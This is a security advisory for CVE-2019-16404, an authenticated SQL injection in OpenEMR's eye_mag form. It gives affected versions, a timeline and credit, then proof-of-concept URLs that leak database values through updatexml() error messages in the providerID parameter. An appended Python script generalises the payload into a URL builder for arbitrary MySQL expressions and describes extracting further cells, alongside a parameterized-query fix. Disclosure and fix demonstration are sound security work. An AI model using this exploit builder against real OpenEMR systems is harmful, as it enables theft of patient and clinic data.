CVE-2019-16404

Authenticated SQL Injection in interface/forms/eye_mag/js/eye_base.php in OpenEMR before 5.0.2.1 allows a user to extract arbitrary data from the openemr database via a non-parameterized INSERT INTO statement, as demonstrated by the providerID parameter.

Timeline

  • Discovered: September 16, 2019
  • Pull Request Issued: September 16, 2019
  • Reported: September 16, 2019
  • OpenEMR merged pull Request: September 17, 2019
  • CVE ID issued: September 17, 2019
  • OpenEMR Release: October 10, 2019 (5.0.2.1)

Version Details

Fixed-In Version: 5.0.2.1

Affected Versions:

  • 5.0.1
  • 5.0.1.1
  • 5.0.1.2
  • 5.0.1.3
  • 5.0.1.4
  • 5.0.1.5
  • 5.0.1.6
  • 5.0.1.7
  • 5.0.2

Credit

Will Porter, Lodestone Security (https://www.lodestonesecurity.com/)

References

Pull Request

POC Exploit

With the OpenEMR instance running on localhost port 80, the following URL exploits the vulnerability: the injected expression version() is evaluated by the database and its result comes back in the XPath syntax error that updatexml() raises.

http://localhost/openemr/interface/forms/eye_mag/js/eye_base.php?providerID=1%27,%274%27,%27title%27,%27notes%27,%275%27,%276%27%20and%20updatexml(0,concat(0x7e,%20(version())),0)),(%271

Note that this requires that no row with providerID 1 already exists in the database. After retrieving one cell of data, the next request has to use a new providerID, since the injection also inserts a row with that providerID. So the next request would be:

http://localhost/openemr/interface/forms/eye_mag/js/eye_base.php?providerID=2%27,%274%27,%27title%27,%27notes%27,%275%27,%276%27%20and%20updatexml(0,concat(0x7e,%20(version())),0)),(%271

and so on and so forth.
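The following Python reconstruction is an added example, not code from the advisory or from OpenEMR. It decodes the providerID payload above, generalises it to any MySQL expression and any providerID (so it regenerates the first and second POC URLs), shows the shape of the string-built INSERT the payload lands in, and contrasts it with a parameterized INSERT. The table name form_eye_mag and the column names are hypothetical stand-ins; the advisory only shows that providerID is the first of six positional values. SQLite is used as an offline stand-in for MySQL, so the injected statement is only built and inspected, never executed (updatexml() does not exist in SQLite); the parameterized version is executed to show the payload stored as an inert literal.

```python
"""CVE-2019-16404 injection reconstruction (added example, not OpenEMR code).
Table/column names are hypothetical; OTHER_VALUES is constructed filler."""
import sqlite3
from urllib.parse import quote, unquote

BASE_URL = "http://localhost/openemr/interface/forms/eye_mag/js/eye_base.php"
TABLE = "form_eye_mag"                                   # hypothetical
COLUMNS = ("providerID", "c2", "c3", "c4", "c5", "c6")  # hypothetical
OTHER_VALUES = ("a", "b", "c", "d", "e")                 # constructed filler


def build_payload(provider_id, expression):
    """providerID value from the advisory, generalised to any MySQL expression.

    It closes the first quoted value, supplies five more, ANDs updatexml() onto
    the sixth, closes the row tuple and opens a second tuple whose leading '1
    absorbs the remainder of the original statement. updatexml() with a bad
    XPath raises a syntax error whose message echoes the concatenated string,
    so the expression's result is leaked through the error text."""
    return "%d','4','title','notes','5','6' and updatexml(0,concat(0x7e, (%s)),0)),('1" % (
        provider_id, expression)


def build_poc_url(provider_id, expression="version()"):
    """URL-encode like the advisory's URLs: only ' and space are percent-encoded."""
    return BASE_URL + "?providerID=" + quote(build_payload(provider_id, expression), safe="(),")


def vulnerable_insert_sql(provider_id):
    """Statement the pre-5.0.2.1 code effectively ran: the request value is pasted in."""
    values = (provider_id,) + OTHER_VALUES
    return "INSERT INTO %s (%s) VALUES (%s)" % (
        TABLE, ", ".join(COLUMNS), ",".join("'%s'" % v for v in values))


def count_row_tuples(sql):
    """Number of VALUES tuples in an INSERT; the injection turns one into two."""
    return sql.count("),(") + 1


def fixed_insert(conn, provider_id):
    """Parameterized form: providerID travels as bound data, never as SQL text.
    Returns (row count, stored providerID) so the caller can check it stayed literal."""
    sql = "INSERT INTO %s (%s) VALUES (?, ?, ?, ?, ?, ?)" % (TABLE, ", ".join(COLUMNS))
    conn.execute(sql, (provider_id,) + OTHER_VALUES)
    n = conn.execute("SELECT COUNT(*) FROM %s" % TABLE).fetchone()[0]
    stored = conn.execute("SELECT providerID FROM %s" % TABLE).fetchone()[0]
    return n, stored


def demo():
    # Decode the providerID value exactly as the server would see it.
    payload = unquote(build_poc_url(1).split("providerID=")[1])
    unsafe_sql = vulnerable_insert_sql(payload)
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE %s (%s)" % (TABLE, ", ".join(c + " TEXT" for c in COLUMNS)))
    rows, stored = fixed_insert(conn, payload)
    return {
        "unsafe_sql": unsafe_sql,
        "unsafe_tuples": count_row_tuples(unsafe_sql),   # 2: injected row + absorbed original
        "fixed_rows": rows,                              # 1: one ordinary row
        "fixed_stored_literal": stored == payload,       # True: payload stored as plain text
    }


if __name__ == "__main__":
    print(build_poc_url(1))
    print(build_poc_url(2))   # the advisory's second request, with a fresh providerID
    for key, value in demo().items():
        print(key, "=", value)
```

Calling build_poc_url(2) reproduces the second URL in the advisory; changing the expression argument (for example to a subquery against openemr tables) is how the same channel extracts other cells, one per unused providerID.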